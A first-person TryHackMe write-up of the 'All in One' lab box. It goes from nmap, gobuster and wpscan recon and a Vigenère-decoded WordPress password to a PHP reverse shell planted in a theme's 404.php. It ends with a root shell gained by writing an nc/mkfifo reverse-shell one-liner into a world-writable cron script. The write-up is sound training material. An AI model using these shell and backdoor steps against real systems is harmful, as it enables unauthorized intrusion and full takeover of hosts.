All in One - TryHackMe writeup

The All in One box is a multi-path box for users to try out multiple approaches. Link to TryHackMe box

Recon

First, as always, we fire up nmap with the usual flags (-A for scripts and version detection, -oA to save our results in every format).

Nmap scan report for 10.10.20.32
Host is up (0.050s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.3.###
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
| 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

As we can see, there are three ports open: 21 (FTP), 22 (SSH) and 80 (HTTP). The -A in our scan gave us a title for the HTTP page, and it’s just the Apache2 default page. This means we should fire up gobuster to learn more about what may be lurking.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.20.32
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/07 19:09:02 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
===============================================================
2021/02/07 19:17:01 Finished
===============================================================

While that’s going on, we also see that FTP has anonymous login allowed. Let’s see what’s on there!

~ ftp 10.10.20.32
Connected to 10.10.20.32.
220 (vsFTPd 3.0.3)
Name (10.10.20.32:m4iler): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 .
drwxr-xr-x 2 0 115 4096 Oct 06 11:57 ..
226 Directory send OK.

That’s a bit disappointing, I thought the root.txt would be right in there. Welp, can’t be helped.

Wordpress

All righty! GoBuster shows us two different URLs: /wordpress and /hackathons. The WordPress site seems like a good find; let’s run wpscan against it!

_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.8.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.20.32/wordpress/ [10.10.20.32]
[+] Started: Sun Feb 7 19:22:09 2021

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://10.10.20.32/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.20.32/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.20.32/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.20.32/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Atom Generator (Aggressive Detection)
| - http://10.10.20.32/wordpress/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.5.1">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-admin/load-styles.php, Match: '5.5.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
| Location: http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/
| Latest Version: 3.1.7 (up to date)
| Last Updated: 2019-05-10T16:05:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <========================================> (22 / 22) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 7 19:22:13 2021
[+] Requests Done: 32
[+] Cached Requests: 26
[+] Data Sent: 8.812 KB
[+] Data Received: 10.017 KB
[+] Memory used: 161.727 MB
[+] Elapsed time: 00:00:04

Mail Masta

Well that’s a lot of text to churn through. Let’s focus on Mail Masta first.

Looking at searchsploit, we have two exploits for Mail Masta: an LFI and a SQL injection.

------------------------------------------------------------ ----------------------
Exploit Title | Path
------------------------------------------------------------ ----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt
------------------------------------------------------------ ----------------------
Shellcodes: No Results

Okay, using the LFI exploit we can read files on the system (but only files accessible to www-data, since that’s the user the web server runs as). This means I could read /etc/passwd, which gave me some information about the user elyana. The SQLi exploit gave us a table, but I couldn’t grab any data from it. Might come around to it later.

Okay, since we got SOME info from Mail Masta, let’s see if there’s any dirt on Reflex Gallery. Running searchsploit again gives us some ideas:

--------------------------------------------------------------------- -----------------------
Exploit Title | Path
--------------------------------------------------------------------- -----------------------
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) | php/remote/36809.rb
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload | php/webapps/36374.txt
--------------------------------------------------------------------- -----------------------
Shellcodes: No Results

Okay, this exploit targets 3.1.3, and the WPScan output tells us the version running here is 3.1.7. No dice (and yes, I’ve tried it in msfconsole before typing this out, suuuuure). Let’s look elsewhere.

The Vinegar hackathon

There was one more directory we haven’t seen so far: /hackathons. Well, it may be more help, eh?

Or... maybe not

Damn. There can’t just be this one sentence! If only there were something we could do to see if there is anything written on the site just to check if the box creator left us any clues!

In the source code of the website we find two lines. One with a jumble of text, the other with something that looks like a key.

The page says they hate vinegar. Well, I’m not fond of it either. Maybe it’s wordplay?

The Vigenère cipher

The Vigenère cipher remained unbroken for a total of 300 years. Now, we have the ciphertext and we’re not in the 18th century, so we should be able to crack it. The second line from the page source can be tried as the decryption key, and with it we get a phrase saying Try #########. Tie that in with our username, and we have something we can put in a login box!

elyana:##########

After putting this in, we get into the Wordpress admin panel!

(NOTE: You can read more about Vigenère ciphers here.)
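To make the decryption step concrete, here is a small Vigenère helper added to this writeup as an example (it is not code from the original post); the plaintext, the key VINEGAR and the candidate-key list are constructed, not the box’s real values.

```python
# Added example, not from the original post: Vigenère encrypt/decrypt and a
# helper that tries several candidate keys (e.g. odd lines from a page source).
import string

ALPHABET = string.ascii_uppercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter of text by the matching key letter.

    Letters keep their case; spaces, digits and punctuation pass through
    unchanged and do not consume a key letter (the usual puzzle convention).
    """
    key_letters = [k for k in key.upper() if k in ALPHABET]
    if not key_letters:
        raise ValueError("key must contain at least one letter")
    out, ki = [], 0
    for ch in text:
        if ch.upper() not in ALPHABET:
            out.append(ch)
            continue
        shift = ALPHABET.index(key_letters[ki % len(key_letters)])
        ki += 1
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr(base + (ord(ch) - base + shift) % 26))
    return "".join(out)


def encrypt(plaintext: str, key: str) -> str:
    return vigenere(plaintext, key, decrypt=False)


def decrypt(ciphertext: str, key: str) -> str:
    return vigenere(ciphertext, key, decrypt=True)


def try_keys(ciphertext: str, candidates) -> dict:
    """Decrypt with every candidate key so the outputs can be eyeballed
    for the one that turns into readable text."""
    return {k: decrypt(ciphertext, k) for k in candidates}


if __name__ == "__main__":
    # Constructed sample: key VINEGAR, plaintext "Try harder".
    ct = encrypt("Try harder", "VINEGAR")
    print(ct)  # Ozl lgruzz
    for k, pt in try_keys(ct, ["LEMON", "VINEGAR"]).items():
        print(f"{k:8} -> {pt}")
```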

Poppin’ shells

From Wordpress, we can do a lot. Blog about puppies and rainbows, let the world know of its impending doom… or just wreak havoc.

There are many ways to get where we want, but the one I chose was manually editing the 404.php template in the theme used. I simply replaced the theme’s 404.php with PentestMonkey’s reverse shell, edited the IP and port to match my netcat listener, and off to the races we go.

nc -lnvp 5050
listening on [any] 5050 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 34002
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:28:10 up 1:26, 0 users, load average: 0.04, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

This is a very good starting point. We can’t read elyana’s user.txt file, let alone root.txt, but we’ll get there. How? LinPEAS.

Privilege escalation

LinPEAS the helpful

LinPEAS is simple to use, yet very powerful. It runs a battery of enumeration commands and highlights anything that looks exploitable, all in a single script that is easy to transfer with wget and a little Python magic.

On the attacker:

cd tools
ls
linpeas.sh php-reverse-shell.php
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the server to be recon’d:

wget 10.11.3.###:8000/linpeas.sh

Now that we have the LinPEAS script, just chmod +x it and run it with ./linpeas.sh.

bash-4.4$ ./linpeas.sh
./linpeas.sh
Starting linpeas. Caching Writable Folders...

linpeas v2.8.7 by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username


====================================( Basic information )=====================================
OS: Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: elyana
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . DONE
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
**[SNIBBEDY SNIB]**
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Aug 6 2020 .
drwxr-xr-x 98 root root 4096 Oct 9 08:38 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root /var/backups/script.sh

I had to snibbedy snib part of the output (it really gives you a LOT), but I left in the one thing we found: a cron job running every minute as root. Let’s see what it’s about!

Admins Anonymous

bash-4.4$ ls -hal /var/backups
ls -hal /var/backups
total 52K
drwxr-xr-x 2 root root 4.0K Oct 7 13:41 .
drwxr-xr-x 14 root root 4.0K Oct 5 19:43 ..
-rw-r--r-- 1 root root 33K Oct 6 11:57 apt.extended_states.0
-rw-r--r-- 1 root root 3.5K Oct 5 21:07 apt.extended_states.1.gz
-rwxrwxrwx 1 root root 79 Feb 7 19:46 script.sh
bash-4.4$

Oh lawdy! 777 permissions on a file run by root? Don’t mind if I do!

What’s the actual content?

bash-4.4$ cat script.sh
cat script.sh
#!/bin/bash

#Just a test script, might use it later to for a cron task

Well diddly darn it, there is nothing important in the file at the moment. The note also says it’s going to be used later. As an undocumented administrator, it will be an honor to help my fellow admins.
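The check a defender would want for this finding, added here as an example (not from the original post or from LinPEAS): parse a system-style crontab and flag root jobs whose target script is missing or writable by anyone other than the trusted owner. The crontab text and the two temporary scripts in demo() are constructed.

```python
# Added example for this writeup (not from the original post or from LinPEAS).
import os
import re
import stat
import tempfile

# System crontab job line: "m h dom mon dow user command" or "@daily user command".
JOB_RE = re.compile(r"^\s*(?:(?:\S+\s+){5}|@\w+\s+)(\S+)\s+(\S+)")


def root_cron_targets(text):
    """Absolute paths run by root jobs; comments and VAR=value lines are skipped."""
    targets = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = JOB_RE.match(line)
        if m and m.group(1) == "root" and m.group(2).startswith("/"):
            targets.append(m.group(2))
    return targets


def weak_cron_scripts(text, trusted_uid=0, trusted_gid=0):
    """(path, reason) for root jobs whose script is missing or writable by
    someone other than the trusted owner/group (the bug that gave root here)."""
    findings = []
    for path in root_cron_targets(text):
        if not os.path.exists(path):
            findings.append((path, "target does not exist"))
            continue
        st, reasons = os.stat(path), []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
            reasons.append("group-writable by an untrusted group")
        if st.st_uid != trusted_uid:
            reasons.append("owned by uid %d" % st.st_uid)
        if reasons:
            findings.append((path, ", ".join(reasons)))
    return findings


def demo():
    """Constructed: a root job running a 0777 script (like /var/backups/script.sh here) beside a 0755 one."""
    with tempfile.TemporaryDirectory() as d:
        weak, good = os.path.join(d, "script.sh"), os.path.join(d, "backup.sh")
        for p, mode in ((weak, 0o777), (good, 0o755)):
            with open(p, "w") as f:
                f.write("#!/bin/bash\n")
            os.chmod(p, mode)
        crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
                   "* * * * * root %s\n17 * * * * root %s\n" % (weak, good))
        me = os.stat(good)  # we own the temp files, so our uid/gid is the trusted one
        return [(os.path.basename(p), why)
                for p, why in weak_cron_scripts(crontab, me.st_uid, me.st_gid)]
```

On a real host you would feed it the contents of /etc/crontab and /etc/cron.d/* with the default trusted_uid=0 and trusted_gid=0.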

Replacing the empty script with a simple reverse shell (courtesy of PayloadsAllTheThings), we can turn an innocuous piece of code into a root reverse shell, bypassing the elyana user entirely.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.### 4242 >/tmp/f" > script.sh

Then, because the script runs every minute, we just have to start a netcat listener to capture our reverse shell.

nc -lnvp 4242

And, several seconds to a minute later, we get our shell back. W00T W00T!

nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 37722
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#

Closing notes

This is labelled an easy box, said to have “multiple possible routes to root, both intentional and unintentional”. I have only found and documented one, but there may be more (seems to me that the FTP server should be another way in). However, the time being what it is (past my bedtime), I will not focus on all the routes in this writeup.

This box has shown me something that may be very useful in real-life pentests: the way may not always be straight ahead. The LFI exploit gave us a username, but no password. The /hackathons directory gave us a password, but no username. We went down several possible rabbit holes (not too deep ones, though), and needed to perform multiple recon passes in order to get something useful.

All in all, huge props to i7m4d for making this amazing box. I have to apologize for my attitude concerning this multi-route box, but it’s way too late for me to run through all of it again and again and again.